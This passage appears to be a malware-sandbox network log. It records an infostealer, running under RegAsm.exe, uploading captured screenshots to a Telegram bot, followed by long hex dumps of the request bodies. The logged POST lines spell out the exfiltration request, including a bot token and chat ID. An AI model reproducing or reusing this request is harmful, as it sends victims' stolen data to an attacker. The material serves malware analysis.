                                                                            2025-01-09 10:38:10 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:10 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:11 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:11 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.449742149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:13 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd30ec763a8fb4
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:13 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 30 65 63 37 36 33 61 38 66 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd30ec763a8fb4Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:13 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:13 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:13 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:13 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:13 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:13 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:13 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:13 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:13 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:14 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:14 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.449748149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:15 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd310a9e90ae48
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:15 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 30 61 39 65 39 30 61 65 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd310a9e90ae48Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:15 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:15 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:15 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:15 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
